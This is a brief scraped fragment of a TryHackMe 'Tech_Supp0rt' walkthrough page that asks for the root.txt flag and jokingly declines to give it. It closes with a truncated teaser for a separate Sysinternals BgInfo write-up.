Source: https://musyokaian.medium.com/tech-supp0rt-tryhackme-walkthough-dcb2376c0890

 

Answer the questions below

 

What is the root.txt flag?

 

Answer: You won't get it that easily!!!

 

 

From <https://tryhackme.com/room/techsupp0rt1>



TryHackMe Write-Up | Sysinternals Task 9  Miscellaneous

BgInfo "It automatically displays relevant information about a Windows computer on the desktop's background, such as the computer ...